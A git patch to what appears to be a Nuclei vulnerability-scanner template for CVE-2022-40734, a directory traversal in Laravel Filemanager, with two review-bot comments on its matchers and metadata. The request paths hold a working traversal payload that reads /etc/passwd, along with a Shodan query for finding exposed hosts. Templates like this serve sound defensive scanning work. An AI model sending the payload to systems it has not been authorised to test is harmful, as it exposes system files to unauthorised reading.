From 4f7d31b4ec188eeb048ed513b5743d27f401428e Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 15 Sep 2022 14:24:40 +0530
Subject: [PATCH] Update CVE-2022-40734.yaml
---
 cves/2022/CVE-2022-40734.yaml | 18 ++++++++----------
 1 file changed, 8 insertions(+), 10 deletions(-)
diff --git a/cves/2022/CVE-2022-40734.yaml b/cves/2022/CVE-2022-40734.yaml
index cd78a9bacf..4fae3434f1 100644
--- a/cves/2022/CVE-2022-40734.yaml
+++ b/cves/2022/CVE-2022-40734.yaml
@@ -1,18 +1,20 @@
 id: CVE-2022-40734
 info:
- name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal.
+ name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal
 author: arafatansari
+ severity: high
 description: |
 UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
- severity: high
 reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40734
 - https://github.com/UniSharp/laravel-filemanager/issues/1150
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-40734
+ classification:
+ cve-id: CVE-2022-40734
 metadata:
- shodan-query: http.html:"Laravel Filemanager"
 verified: true
- tags: traversal,unauthenticated,laravel,unisharp,cve,2022
+ shodan-query: http.html:"Laravel Filemanager"
+ tags: cve,cve2022,laravel,unisharp,lfi,traversal
 requests:
 - method: GET
@@ -20,12 +22,8 @@ requests:
 - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
 - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
- matchers-condition: and
+ stop-at-first-match: true
 matchers:
 - type: regex
 regex:
 - "root:[x*]:0:0"
- - type: status
- status:
- - 200
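Review bot: The new `classification` block carries only `cve-id`, so a finding from this template reaches triage without a weakness class. The description already calls this a directory traversal, so adding `cwe-id: CWE-22` next to `cve-id` would make that explicit. The same hunk also drops the `unauthenticated` tag with no replacement; if the endpoint is still reachable without a login, that tag helps prioritisation and is worth keeping. The `requests` block that closes this hunk continues outside it.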
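Review bot: With `matchers-condition: and` and the `status` matcher removed, a hit now rests on the body regex `root:[x*]:0:0` alone, so any response containing that string matches whatever its status code. The commit message gives no reason for dropping the status check. If the affected endpoint was seen returning the file with a non-200 status, record that above `matchers:`, for example `# status not checked: affected hosts may answer with a non-200 code` (the reason here is a guess; replace it with what was observed). Otherwise keep `matchers-condition: and` with the `status: 200` matcher to limit false positives, and re-confirm `verified: true` against the changed matcher. The request block begins before this hunk.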